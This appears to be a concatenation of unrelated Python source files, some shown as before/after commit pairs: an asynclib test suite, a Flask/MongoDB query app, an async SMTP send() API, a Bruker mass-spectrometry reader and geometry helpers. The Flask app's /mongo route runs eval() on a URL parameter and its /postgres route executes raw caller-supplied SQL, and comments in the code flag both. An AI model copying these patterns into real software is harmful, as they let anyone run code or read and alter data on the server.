                (select.POLLHUP, 'closed'),
                (select.POLLNVAL, 'closed'),
            )
            # Recorder object: each handler just flips its flag.
            class testobj:
                def __init__(self):
                    self.read = False
                    self.write = False
                    self.closed = False
                    self.expt = False
                    self.error_handled = False
                def handle_read_event(self):
                    self.read = True
                def handle_write_event(self):
                    self.write = True
                def handle_close(self):
                    self.closed = True
                def handle_exception_event(self):
                    self.expt = True
                def handle_error(self):
                    self.error_handled = True
            for flag, expectedattr in expected:
                tobj = testobj()
                self.assertEqual(getattr(tobj, expectedattr), False)
                asynclib.readwrite(tobj, flag)
                # Only the attribute modified by the routine we expect to be
                # called should be True.
                for attr in attributes:
                    self.assertEqual(getattr(tobj, attr), attr==expectedattr)
                # check that ExitNow exceptions in the object handler method
                # bubbles all the way up through asynclib readwrite call
                tr1 = exitingdummy()
                self.assertRaises(asynclib.ExitNow, asynclib.readwrite, tr1, flag)
                # check that an exception other than ExitNow in the object handler
                # method causes the handle_error method to get called
                tr2 = crashingdummy()
                self.assertEqual(tr2.error_handled, False)
                asynclib.readwrite(tr2, flag)
                self.assertEqual(tr2.error_handled, True)
    def test_closeall(self):
        self.closeall_check(False)
    def test_closeall_default(self):
        # Same check, but against asynclib's default global socket map.
        self.closeall_check(True)
    def closeall_check(self, usedefault):
        # Check that close_all() closes everything in a given map
        l = []
        testmap = {}
        for i in range(10):
            c = dummychannel()
            l.append(c)
            self.assertEqual(c.socket.closed, False)
            testmap[i] = c
        if usedefault:
            # Temporarily swap our map in as the global one, then restore.
            socketmap = asynclib._SOCKET_MAP
            try:
                asynclib._SOCKET_MAP = testmap
                asynclib.close_all()
            finally:
                testmap, asynclib._SOCKET_MAP = asynclib._SOCKET_MAP, socketmap
        else:
            asynclib.close_all(testmap)
        self.assertEqual(len(testmap), 0)
        for c in l:
            self.assertEqual(c.socket.closed, True)
class DispatcherTests(unittest.TestCase):
    """Basic Dispatcher behavior: defaults, repr and _strerror."""
    def setUp(self):
        pass
    def tearDown(self):
        # Drop any dispatchers registered with the global socket map.
        asynclib.close_all()
    def test_basic(self):
        # A bare Dispatcher defaults to both readable and writable.
        d = asynclib.Dispatcher()
        self.assertEqual(d.readable(), True)
        self.assertEqual(d.writable(), True)
    def test_repr(self):
        d = asynclib.Dispatcher()
        self.assertTrue(repr(d).endswith('Dispatcher at %#x>' % id(d)))
    def test_strerror(self):
        # refers to bug #8573
        err = asynclib._strerror(errno.EPERM)
        if hasattr(os, 'strerror'):
            self.assertEqual(err, os.strerror(errno.EPERM))
        # An unknown error number falls back to a generic message.
        err = asynclib._strerror(-1)
        self.assertTrue("unknown error" in err.lower())
class DispatcherWithSendTests(unittest.TestCase):
    """End-to-end send() test over a real loopback socket (currently skipped)."""
    usepoll = False
    def setUp(self):
        pass
    def tearDown(self):
        asynclib.close_all()
    @skip
    def test_send(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(3)
        self.port = test_support.bind_port(self.sock)
        cap = StringIO()
        args = (self.evt, cap, self.sock)
        # capture_server collects everything sent until a newline arrives.
        threading.Thread(target=capture_server, args=args).start()
        # wait a little longer for the server to initialize (it sometimes
        # refuses connections on slow machines without this wait)
        time.sleep(0.2)
        data = "Suppose there isn't a 16-ton weight?".encode()
        d = dispatcherwithsend_noread()
        d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        d.connect((HOST, self.port))
        # give time for socket to connect
        time.sleep(0.1)
        d.send(data)
        d.send(data)
        d.send('\n')
        # Pump the event loop until the outgoing buffer drains (bounded).
        n = 1000
        while d.out_buffer and n > 0:
            asynclib.poll()
            n -= 1
        self.evt.wait()
        self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
    """Same suite, exercised with the poll()-based loop variant."""
    usepoll = True
class CallLaterTests(unittest.TestCase):
    """Tests for CallLater class."""
    def setUp(self):
        # remove any unfired scheduled call left behind
        asynclib.close_all()
    def scheduler(self, timeout=0.01, count=100):
        # Drive the asynclib scheduler until all scheduled tasks have fired,
        # bounded by `count` iterations so a stuck task can't hang the test.
        while asynclib._SCHEDULED_TASKS and count > 0:
            asynclib.scheduler()
            count -= 1
            time.sleep(timeout)
    def test_interface(self):
        fun = lambda: 0
        self.assertRaises(AssertionError, asynclib.call_later, -1, fun)
        x = asynclib.call_later(3, fun)
        self.assertRaises(AssertionError, x.delay, -1)
        self.assertTrue(x.cancelled is False)
        x.cancel()
        self.assertTrue(x.cancelled is True)
        # Once cancelled, every further operation must fail.
        self.assertRaises(AssertionError, x.call)
        self.assertRaises(AssertionError, x.reset)
        self.assertRaises(AssertionError, x.delay, 2)
        self.assertRaises(AssertionError, x.cancel)
    def test_order(self):
        # Tasks fire in deadline order, not registration order.
        l = []
        fun = lambda x: l.append(x)
        for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
            asynclib.call_later(x, fun, x)
        self.scheduler()
        self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
    def test_delay(self):
        # delay() moves a task's deadline and re-orders it accordingly.
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01).delay(0.07)
        asynclib.call_later(0.02, fun, 0.02).delay(0.08)
        asynclib.call_later(0.03, fun, 0.03)
        asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05)
        asynclib.call_later(0.06, fun, 0.06).delay(0.001)
        self.scheduler()
        self.assertEqual(l, [0.06, 0.03, 0.04, 0.05, 0.01, 0.02])
    def test_reset(self):
        # reset() restarts a task's countdown from "now".
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01)
        asynclib.call_later(0.02, fun, 0.02)
        asynclib.call_later(0.03, fun, 0.03)
        x = asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05)
        time.sleep(0.1)
        x.reset()
        self.scheduler()
        self.assertEqual(l, [0.01, 0.02, 0.03, 0.05, 0.04])
    def test_cancel(self):
        # Cancelled tasks never fire.
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01).cancel()
        asynclib.call_later(0.02, fun, 0.02)
        asynclib.call_later(0.03, fun, 0.03)
        asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05).cancel()
        self.scheduler()
        self.assertEqual(l, [0.02, 0.03, 0.04])
def test_main():
    """Run every test class in this module via test.support's runner."""
    tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
             CallLaterTests, DispatcherWithSendTests_UsePoll]
    run_unittest(*tests)
if __name__ == "__main__":
    test_main()
|
#!/usr/bin/python3
# -*- coding: latin-1 -*-
import os
import sys
# import psycopg2
import json
from bson import json_util
from pymongo import MongoClient, DESCENDING
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, current_app, make_response, jsonify
from flask_cors import CORS, cross_origin
from datetime import timedelta
from functools import update_wrapper
def create_app():
    """Application factory: build and return a fresh Flask app."""
    return Flask(__name__)
app = create_app()
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "genuino"
MONGOSERVER = "localhost"
MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
db2 = client.genuino
escuchas = db2.escuchas
''' # Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
POSTGRESDATABASE = "mydatabase"
POSTGRESUSER = "myuser"
POSTGRESPASS = "mypass"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=POSTGRESPASS)
'''
# Cambiar por Path Absoluto en el servidor
QUERIES_FILENAME = '/var/www/flaskr/queries'
@app.route("/")
def home():
    """Render the landing page listing the canned queries from QUERIES_FILENAME.

    The file is expected to contain a JSON array of objects with the keys
    `name`, `database`, `description` and `query`.
    """
    with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
        json_file = json.load(queries_file)
        pairs = [(x["name"],
                  x["database"],
                  x["description"],
                  x["query"]) for x in json_file]
        return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
    """Run a raw pymongo expression supplied in the `query` query-string arg."""
    query = request.args.get("query")
    # SECURITY: eval() of a caller-supplied string executes arbitrary Python
    # on the server -- anyone who can reach this endpoint can run code here.
    # Keep this route behind trusted access only, or replace with an
    # explicit, parameterized query API.
    results = eval('mongodb.' + query)
    results = json_util.dumps(results, sort_keys=True, indent=4)
    # Only find() results get rendered; write operations just acknowledge.
    if "find" in query:
        return render_template('mongo.html', results=results)
    else:
        return "ok"
@app.route("/api/<consulta>/<datos1>")
@cross_origin(origin='*')
def api(consulta, datos1):
    """Small JSON API dispatched on the `consulta` path segment.

    consulta == '1': `datos1` is a date string; returns the `numero` field of
    every `escuchas` document with that `fecha`.
    consulta == '2': `datos1` is "<numero>_<limite>"; returns that number's
    documents sorted by `fecha`, newest first.
    consulta == '3': echoes `datos1` back as {'date': ...}.
    Anything else: 'Not Implemented'.
    """
    if consulta == '1':
        fecha = datos1
        # SECURITY FIX: query pymongo directly with a parameter dict instead
        # of building a Python expression string and eval()-ing it -- a
        # crafted URL segment could previously execute arbitrary code.
        resultado = mongodb.escuchas.find({'fecha': fecha}, {'numero': 1})
        return json_util.dumps(resultado, sort_keys=True, indent=4)
    elif consulta == '2':
        separados = datos1.split('_')
        numero = separados[0]
        # BUG FIX: pymongo's sort() takes (key, direction) pairs, not dicts;
        # sort([{'fecha': DESCENDING}]) raises at runtime.  (The unused
        # `limite` local was dropped as well.)
        consultilla = escuchas.find({'numero': numero}).sort([('fecha', DESCENDING)])
        return json_util.dumps(consultilla, sort_keys=True, indent=4)
    elif consulta == '3':
        clave = datos1
        fecha = clave
    else:
        return 'Not Implemented'
    # Only reached for consulta == '3'.
    coso = jsonify({'date': fecha})
    return coso
@app.route("/postgres")
def postgres():
    """Execute a raw SQL statement supplied in the `query` query-string arg.

    NOTE(review): `postgresdb` is only defined if the commented-out psycopg2
    block at module top is enabled; as shipped, this route raises NameError.
    """
    query = request.args.get("query")
    # SECURITY: executes caller-supplied SQL verbatim -- full read/write
    # access to the database for anyone who can reach this endpoint.
    cursor = postgresdb.cursor()
    cursor.execute(query)
    results = [[a for a in result] for result in cursor]
    print(results)
    return render_template('postgres.html', results=results)
@app.route("/example")
def example():
    """Render the static example page."""
    template_name = 'example.html'
    return render_template(template_name)
if __name__ == "__main__":
    # Run Flask's built-in development server when executed directly.
    app.run()
mongotest1.28
#!/usr/bin/python3
# -*- coding: latin-1 -*-
import os
import sys
# import psycopg2
import json
from bson import json_util
from pymongo import MongoClient, DESCENDING
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, current_app, make_response, jsonify
from flask_cors import CORS, cross_origin
from datetime import timedelta
from functools import update_wrapper
def create_app():
    """Application factory: build and return a fresh Flask app."""
    return Flask(__name__)
app = create_app()
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
# REPLACE WITH YOUR DATABASE NAME
MONGODATABASE = "genuino"
MONGOSERVER = "localhost"
MONGOPORT = 27017
client = MongoClient(MONGOSERVER, MONGOPORT)
mongodb = client[MONGODATABASE]
db2 = client.genuino
escuchas = db2.escuchas
''' # Uncomment for postgres connection
# REPLACE WITH YOUR DATABASE NAME, USER AND PASS
POSTGRESDATABASE = "mydatabase"
POSTGRESUSER = "myuser"
POSTGRESPASS = "mypass"
postgresdb = psycopg2.connect(
database=POSTGRESDATABASE,
user=POSTGRESUSER,
password=POSTGRESPASS)
'''
# Cambiar por Path Absoluto en el servidor
QUERIES_FILENAME = '/var/www/flaskr/queries'
@app.route("/")
def home():
    """Render the landing page listing the canned queries from QUERIES_FILENAME.

    The file is expected to contain a JSON array of objects with the keys
    `name`, `database`, `description` and `query`.
    """
    with open(QUERIES_FILENAME, 'r', encoding='utf-8') as queries_file:
        json_file = json.load(queries_file)
        pairs = [(x["name"],
                  x["database"],
                  x["description"],
                  x["query"]) for x in json_file]
        return render_template('file.html', results=pairs)
@app.route("/mongo")
def mongo():
    """Run a raw pymongo expression supplied in the `query` query-string arg."""
    query = request.args.get("query")
    # SECURITY: eval() of a caller-supplied string executes arbitrary Python
    # on the server -- anyone who can reach this endpoint can run code here.
    # Keep this route behind trusted access only, or replace with an
    # explicit, parameterized query API.
    results = eval('mongodb.' + query)
    results = json_util.dumps(results, sort_keys=True, indent=4)
    # Only find() results get rendered; write operations just acknowledge.
    if "find" in query:
        return render_template('mongo.html', results=results)
    else:
        return "ok"
@app.route("/api/<consulta>/<datos1>")
@cross_origin(origin='*')
def api(consulta, datos1):
    """Small JSON API dispatched on the `consulta` path segment.

    consulta == '1': `datos1` is a date string; returns the `numero` field of
    every `escuchas` document with that `fecha`.
    consulta == '2': `datos1` is "<numero>[_...]"; returns that number's
    documents sorted by `fecha`, newest first.
    consulta == '3': echoes `datos1` back as {'date': ...}.
    Anything else: 'Not Implemented'.
    """
    if consulta == '1':
        fecha = datos1
        # SECURITY FIX: query pymongo directly with a parameter dict instead
        # of building a Python expression string and eval()-ing it -- a
        # crafted URL segment could previously execute arbitrary code.
        resultado = mongodb.escuchas.find({'fecha': fecha}, {'numero': 1})
        return json_util.dumps(resultado, sort_keys=True, indent=4)
    elif consulta == '2':
        separados = datos1.split('_')
        numero = separados[0]
        # BUG FIX: pymongo's sort() takes (key, direction) pairs, not dicts;
        # sort([{'fecha': DESCENDING}]) raises at runtime.
        consultilla = escuchas.find({'numero': numero}).sort([('fecha', DESCENDING)])
        return json_util.dumps(consultilla, sort_keys=True, indent=4)
    elif consulta == '3':
        clave = datos1
        fecha = clave
    else:
        return 'Not Implemented'
    # Only reached for consulta == '3'.
    coso = jsonify({'date': fecha})
    return coso
@app.route("/postgres")
def postgres():
    """Execute a raw SQL statement supplied in the `query` query-string arg.

    NOTE(review): `postgresdb` is only defined if the commented-out psycopg2
    block at module top is enabled; as shipped, this route raises NameError.
    """
    query = request.args.get("query")
    # SECURITY: executes caller-supplied SQL verbatim -- full read/write
    # access to the database for anyone who can reach this endpoint.
    cursor = postgresdb.cursor()
    cursor.execute(query)
    results = [[a for a in result] for result in cursor]
    print(results)
    return render_template('postgres.html', results=results)
@app.route("/example")
def example():
    """Render the static example page."""
    template_name = 'example.html'
    return render_template(template_name)
if __name__ == "__main__":
    # Run Flask's built-in development server when executed directly.
    app.run()
|
"""
Main public API.
"""
import ssl
from email.message import Message
from typing import Dict, Iterable, Optional, Tuple, Union, overload
from .compat import get_running_loop
from .connection import DEFAULT_TIMEOUT
from .response import SMTPResponse
from .smtp import SMTP
__all__ = ("send",)
@overload
async def send(
    message: Message,
    sender: Optional[str] = None,
    recipients: Optional[Union[str, Iterable[str]]] = None,
    hostname: Optional[str] = None,
    port: Optional[int] = None,
    username: Optional[str] = None,
    password: Optional[str] = None,
    mail_options: Optional[Iterable[str]] = None,
    rcpt_options: Optional[Iterable[str]] = None,
    timeout: Optional[float] = DEFAULT_TIMEOUT,
    source_address: Optional[str] = None,
    use_tls: bool = False,
    start_tls: bool = False,
    validate_certs: bool = True,
    client_cert: Optional[str] = None,
    client_key: Optional[str] = None,
    tls_context: Optional[ssl.SSLContext] = None,
    cert_bundle: Optional[str] = None,
) -> Tuple[Dict[str, SMTPResponse], str]:
    """Typing-only overload: Message input, so sender/recipients may be omitted
    (taken from the message headers).  The implementation follows below."""
    pass
@overload  # NOQA: F811
async def send(
    message: Union[str, bytes],
    sender: str = "",
    recipients: Union[str, Iterable[str]] = "",
    hostname: Optional[str] = None,
    port: Optional[int] = None,
    username: Optional[str] = None,
    password: Optional[str] = None,
    mail_options: Optional[Iterable[str]] = None,
    rcpt_options: Optional[Iterable[str]] = None,
    timeout: Optional[float] = DEFAULT_TIMEOUT,
    source_address: Optional[str] = None,
    use_tls: bool = False,
    start_tls: bool = False,
    validate_certs: bool = True,
    client_cert: Optional[str] = None,
    client_key: Optional[str] = None,
    tls_context: Optional[ssl.SSLContext] = None,
    cert_bundle: Optional[str] = None,
) -> Tuple[Dict[str, SMTPResponse], str]:
    """Typing-only overload: raw str/bytes input, so sender and recipients
    must be supplied explicitly.  The implementation follows below."""
    pass
async def send(  # NOQA: F811
    message,
    sender=None,
    recipients=None,
    username=None,
    password=None,
    start_tls=False,
    port=None,
    use_tls=False,
    **kwargs
):
    """
    Send an email message, connecting to the SMTP server on await and
    disconnecting afterwards.

    :param message: Either an :py:class:`email.message.Message` object,
        ``str`` or ``bytes``. For a Message object, sender and recipients
        set in the message headers are used unless overridden by the
        respective keyword arguments.
    :keyword sender: From email address. Not required if a Message object
        is provided for the `message` argument.
    :keyword recipients: Recipient email addresses. Not required if a
        Message object is provided for the `message` argument.
    :keyword hostname: Server name (or IP) to connect to. Defaults to
        "localhost".
    :keyword port: Server port. Defaults to ``465`` if ``use_tls`` is
        ``True``, ``587`` if ``start_tls`` is ``True``, or ``25`` otherwise.
    :keyword username: Username to login as after connect.
    :keyword password: Password for login after connect.
    :keyword source_address: The hostname of the client. Defaults to the
        result of :py:func:`socket.getfqdn` (note: that call blocks).
    :keyword timeout: Default timeout value for the connection, in seconds.
        Defaults to 60.
    :keyword use_tls: If True, make the initial connection over TLS/SSL.
        Should be False for servers that only support STARTTLS.
    :keyword start_tls: If True, connect over plaintext and then upgrade
        the connection via STARTTLS. Not compatible with use_tls.
    :keyword validate_certs: Determines if server certificates are
        validated. Defaults to True.
    :keyword client_cert: Path to client side certificate, for TLS.
    :keyword client_key: Path to client side key, for TLS.
    :keyword tls_context: An existing :py:class:`ssl.SSLContext`, for TLS.
        Mutually exclusive with ``client_cert``/``client_key``.
    :keyword cert_bundle: Path to certificate bundle, for TLS verification.
    :raises ValueError: required arguments missing or mutually exclusive
        options provided
    """
    is_email_message = isinstance(message, Message)
    # Raw str/bytes messages carry no headers, so the envelope must be given.
    if not is_email_message:
        if not recipients:
            raise ValueError("Recipients must be provided with raw messages.")
        if not sender:
            raise ValueError("Sender must be provided with raw messages.")
    smtp_client = SMTP(
        loop=get_running_loop(),
        port=port,
        username=username,
        password=password,
        use_tls=use_tls,
        start_tls=start_tls,
        **kwargs
    )
    # Connect, send, then disconnect via the async context manager.
    async with smtp_client:
        if is_email_message:
            return await smtp_client.send_message(
                message, sender=sender, recipients=recipients
            )
        return await smtp_client.sendmail(sender, recipients, message)
Type overloads don't need kwarg defaults
"""
Main public API.
"""
import ssl
from email.message import Message
from typing import Dict, Iterable, Optional, Tuple, Union, overload
from .compat import get_running_loop
from .response import SMTPResponse
from .smtp import SMTP
__all__ = ("send",)
@overload
async def send(
    message: Message,
    sender: Optional[str] = ...,
    recipients: Optional[Union[str, Iterable[str]]] = ...,
    hostname: Optional[str] = ...,
    port: Optional[int] = ...,
    username: Optional[str] = ...,
    password: Optional[str] = ...,
    mail_options: Optional[Iterable[str]] = ...,
    rcpt_options: Optional[Iterable[str]] = ...,
    timeout: Optional[float] = ...,
    source_address: Optional[str] = ...,
    use_tls: bool = ...,
    start_tls: bool = ...,
    validate_certs: bool = ...,
    client_cert: Optional[str] = ...,
    client_key: Optional[str] = ...,
    tls_context: Optional[ssl.SSLContext] = ...,
    cert_bundle: Optional[str] = ...,
) -> Tuple[Dict[str, SMTPResponse], str]:
    """Typing-only overload: send an :py:class:`email.message.Message`."""
    ...
@overload  # NOQA: F811
async def send(
    message: Union[str, bytes],
    sender: str = ...,
    recipients: Union[str, Iterable[str]] = ...,
    hostname: Optional[str] = ...,
    port: Optional[int] = ...,
    username: Optional[str] = ...,
    password: Optional[str] = ...,
    mail_options: Optional[Iterable[str]] = ...,
    rcpt_options: Optional[Iterable[str]] = ...,
    timeout: Optional[float] = ...,
    source_address: Optional[str] = ...,
    use_tls: bool = ...,
    start_tls: bool = ...,
    validate_certs: bool = ...,
    client_cert: Optional[str] = ...,
    client_key: Optional[str] = ...,
    tls_context: Optional[ssl.SSLContext] = ...,
    cert_bundle: Optional[str] = ...,
) -> Tuple[Dict[str, SMTPResponse], str]:
    """Typing-only overload: send a raw ``str``/``bytes`` message."""
    ...
async def send(  # NOQA: F811
    message,
    sender=None,
    recipients=None,
    username=None,
    password=None,
    start_tls=False,
    port=None,
    use_tls=False,
    **kwargs
):
    """
    Send an email message. On await, connects to the SMTP server using the details
    provided, sends the message, then disconnects.
    :param message: Message text. Either an :py:class:`email.message.Message`
    object, ``str`` or ``bytes``. If an :py:class:`email.message.Message` object is
    provided, sender and recipients set in the message headers will be used, unless
    overridden by the respective keyword arguments.
    :keyword sender: From email address. Not required if an
    :py:class:`email.message.Message` object is provided for the `message` argument.
    :keyword recipients: Recipient email addresses. Not required if an
    :py:class:`email.message.Message` object is provided for the `message` argument.
    :keyword hostname: Server name (or IP) to connect to. Defaults to "localhost".
    :keyword port: Server port. Defaults ``465`` if ``use_tls`` is ``True``,
    ``587`` if ``start_tls`` is ``True``, or ``25`` otherwise.
    :keyword username: Username to login as after connect.
    :keyword password: Password for login after connect.
    :keyword source_address: The hostname of the client. Defaults to the
    result of :py:func:`socket.getfqdn`. Note that this call blocks.
    :keyword timeout: Default timeout value for the connection, in seconds.
    Defaults to 60.
    :keyword use_tls: If True, make the initial connection to the server
    over TLS/SSL. Note that if the server supports STARTTLS only, this
    should be False.
    :keyword start_tls: If True, make the initial connection to the server
    over plaintext, and then upgrade the connection to TLS/SSL. Not
    compatible with use_tls.
    :keyword validate_certs: Determines if server certificates are
    validated. Defaults to True.
    :keyword client_cert: Path to client side certificate, for TLS.
    :keyword client_key: Path to client side key, for TLS.
    :keyword tls_context: An existing :py:class:`ssl.SSLContext`, for TLS.
    Mutually exclusive with ``client_cert``/``client_key``.
    :keyword cert_bundle: Path to certificate bundle, for TLS verification.
    :raises ValueError: required arguments missing or mutually exclusive options
    provided
    """
    # Raw str/bytes messages carry no headers, so the envelope (sender and
    # recipients) has to be supplied explicitly.
    if not isinstance(message, Message):
        if not recipients:
            raise ValueError("Recipients must be provided with raw messages.")
        if not sender:
            raise ValueError("Sender must be provided with raw messages.")
    loop = get_running_loop()
    # Remaining keyword arguments (hostname, timeout, TLS options, ...) are
    # forwarded unchanged to the SMTP client constructor.
    client = SMTP(
        loop=loop,
        port=port,
        username=username,
        password=password,
        use_tls=use_tls,
        start_tls=start_tls,
        **kwargs
    )
    # Connect, send, then disconnect via the async context manager.
    async with client:
        if isinstance(message, Message):
            result = await client.send_message(
                message, sender=sender, recipients=recipients
            )
        else:
            result = await client.sendmail(sender, recipients, message)
    return result
|
from aston import Datafile
import struct
import numpy as np
class BrukerMSMS(Datafile.Datafile):
    """Reader for Bruker MS/MS raw data files.

    Caches scan times and the total ion abundance per scan into
    ``self.data`` (shape ``(n_scans, 2)``: time in minutes, summed
    abundance).
    """
    ext = 'AMI'
    mgc = None

    def __init__(self, *args, **kwargs):
        super(BrukerMSMS, self).__init__(*args, **kwargs)

    def _cacheData(self):
        """Parse the raw file into ``self.data``; no-op if already cached."""
        if self.data is not None:
            return

        def rd(f, st):
            # Read and unpack one struct-formatted record from the stream.
            return struct.unpack(st, f.read(struct.calcsize(st)))

        # Use a context manager so the handle is closed even if parsing fails
        # (the previous version leaked the file object on error).
        with open(self.rawdata, 'rb') as f:
            recs = rd(f, 'ii')[1]
            self.data = np.zeros((recs, 2))
            times = rd(f, recs * 'd')
            self.data[:, 0] = np.array(times) / 60  # seconds -> minutes
            rd(f, 'i')  # number of data points again
            for i in range(recs):
                n_pts = rd(f, 'i')[0]
                rd(f, n_pts * 'f')  # per-scan ion m/z values (unused here)
                rd(f, 'i')  # number of pts in spectra again
                abun = rd(f, n_pts * 'f')
                self.data[i, 1] = sum(abun)
        self.ions = [1]

    def _updateInfoFromFile(self):
        """Set default metadata for this file type."""
        self.info.update({'r-type': 'Sample'})
BrukerMSMS now has individual ions.
from aston import Datafile
import struct
import numpy as np
import scipy.sparse
class BrukerMSMS(Datafile.Datafile):
    """Reader for Bruker MS/MS raw data files.

    Parses scan times and per-scan (ion, abundance) pairs into a sparse
    CSR matrix ``self.data`` of shape ``(n_scans, n_ions + 1)``; column 0
    holds the scan time in minutes, the remaining columns one ion each
    (order given by ``self.ions``).
    """
    ext = 'AMI'
    mgc = None

    def __init__(self, *args, **kwargs):
        super(BrukerMSMS, self).__init__(*args, **kwargs)

    def _cacheData(self):
        """Parse the raw file into ``self.data``/``self.ions``; no-op if cached."""
        if self.data is not None:
            return

        def rd(f, st):
            # Read and unpack one struct-formatted record from the stream.
            return struct.unpack(st, f.read(struct.calcsize(st)))

        # Use a context manager so the handle is always closed (the previous
        # version never closed the file: the f.close() call was commented out).
        with open(self.rawdata, 'rb') as f:
            nscans = rd(f, 'ii')[1]
            if nscans == 0:
                self.ions = []
                self.data = None
                return
            times = np.array(rd(f, nscans * 'd')) / 60.0  # seconds -> minutes
            f.seek(f.tell() + 4)  # number of scans again

            # First pass: count points per scan to build the CSR row pointers.
            indptr = np.empty(nscans + 1, dtype=int)
            indptr[0] = 0
            dpos = f.tell()
            tot_pts = 0
            for scn in range(nscans):
                npts = rd(f, 'i')[0]
                # Skip ion list (4*npts), repeated count (4) and abundances
                # (4*npts) without unpacking them.
                f.seek(f.tell() + 8 * npts + 4)
                tot_pts += npts + 1  # one extra slot per scan for the time
                indptr[scn + 1] = tot_pts
            f.seek(dpos)

            # Second pass: fill in column indices and values.
            self.ions = []
            i_lkup = {}  # ion (int m/z) -> column index
            idxs = np.empty(tot_pts, dtype=int)
            vals = np.empty(tot_pts, dtype=float)
            for scn in range(nscans):
                npts = rd(f, 'i')[0]
                rd_ions = rd(f, npts * 'f')
                f.seek(f.tell() + 4)  # number of points again
                abun = rd(f, npts * 'f')
                # Register ions not seen before, preserving a stable mapping.
                nions = set(int(i) for i in rd_ions if int(i) not in i_lkup)
                i_lkup.update(dict((ion, i + len(self.ions))
                                   for i, ion in enumerate(nions)))
                self.ions += nions
                # Index -1 is the time pseudo-column (shifted to 0 below).
                idxs[indptr[scn]:indptr[scn + 1]] = \
                    [-1] + [i_lkup[int(i)] for i in rd_ions]
                vals[indptr[scn]:indptr[scn + 1]] = (times[scn],) + abun

        # Shift so the time pseudo-ion occupies column 0.
        idxs += 1
        self.data = scipy.sparse.csr_matrix(
            (vals, idxs, indptr),
            shape=(nscans, len(self.ions) + 1), dtype=float)

    def _updateInfoFromFile(self):
        """Set default metadata for this file type."""
        self.info.update({'r-type': 'Sample'})
|
''' Helper functions for geometrical operations.
'''
from __future__ import division
import logging
import tables as tb
import numpy as np
def get_plane_normal(direction_vector_1, direction_vector_2):
    ''' Normal vector of the plane spanned by two direction vectors.

    The plane is defined by two non-parallel direction vectors lying
    within it; the normal is their cross product.

    Parameters
    ----------
    direction_vector_1 : array
        Array with x, y and z.
    direction_vector_2 : array
        Array with x, y and z.

    Returns
    -------
    Array with x, y and z.
    '''
    normal = np.cross(direction_vector_1, direction_vector_2)
    return normal
def get_line_intersections_with_plane(line_origins, line_directions,
                                      position_plane, normal_plane):
    ''' Calculates the intersection of n lines with one plane.

    If a line has no intersection point (it is parallel to the plane or
    lies within it) its intersection is set to nan.

    Notes
    -----
    Further information:
    http://stackoverflow.com/questions/4938332/line-plane-intersection-based-on-points

    Parameters
    ----------
    line_origins : array
        A point (x, y and z) on the line for each of the n lines.
    line_directions : array
        The direction vector of the line for n lines.
    position_plane : array
        A array (x, y and z) to the plane.
    normal_plane : array
        The normal vector (x, y and z) of the plane.

    Returns
    -------
    Array with shape (n, 3) with the intersection point.
    '''
    # Vector from each line origin to the plane reference point
    plane_offsets = position_plane[np.newaxis, :] - line_origins
    numerator = np.dot(normal_plane, plane_offsets.T)
    # atleast_1d keeps the special case n = 1 working
    denominator = np.atleast_1d(np.dot(normal_plane, line_directions.T))
    # nan marks lines without a unique intersection
    scale = np.full_like(numerator, fill_value=np.nan)
    if np.any(denominator == 0):
        logging.warning('Some line plane intersection could not be calculated')
    # Avoid division by zero for parallel / in-plane lines
    valid = denominator != 0
    scale[valid] = numerator[valid] / denominator[valid]
    return line_origins + line_directions * scale[:, np.newaxis]
def cartesian_to_spherical(x, y, z):
    ''' Transformation from cartesian to spherical coordinates.

    Convention: r = 0 --> phi = theta = 0, and phi = 0 for x = 0.

    Parameters
    ----------
    x, y, z : array
        Position in cartesian space.

    Returns
    -------
    Spherical coordinates phi, theta and r.
    '''
    r = np.sqrt(x * x + y * y + z * z)
    phi = np.zeros_like(r)    # convention: phi = 0 for x = 0
    theta = np.zeros_like(r)  # convention: theta = 0 for r = 0
    # Guard against division by zero, see
    # https://en.wikipedia.org/wiki/Atan2
    nonzero_x = x != 0
    phi[nonzero_x] = np.arctan2(y[nonzero_x], x[nonzero_x])
    phi[phi < 0] += 2. * np.pi  # map to phi = [0 .. 2 pi[
    nonzero_r = r != 0
    theta[nonzero_r] = np.arccos(z[nonzero_r] / r[nonzero_r])
    return phi, theta, r
def spherical_to_cartesian(phi, theta, r):
    ''' Transformation from spherical to cartesian coordinates.

    Validates the input ranges before converting.

    Parameters
    ----------
    phi, theta, r : array
        Position in spherical space.

    Returns
    -------
    Cartesian coordinates x, y and z.

    Raises
    ------
    RuntimeError
        If r, theta or phi are outside their valid ranges.
    '''
    if np.any(r < 0):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because r < 0')
    if np.any(theta < 0) or np.any(theta >= np.pi):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because theta exceeds [0, Pi[')
    if np.any(phi < 0) or np.any(phi >= 2 * np.pi):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because phi exceeds [0, 2*Pi[')
    sin_theta = np.sin(theta)
    return (r * np.cos(phi) * sin_theta,
            r * np.sin(phi) * sin_theta,
            r * np.cos(theta))
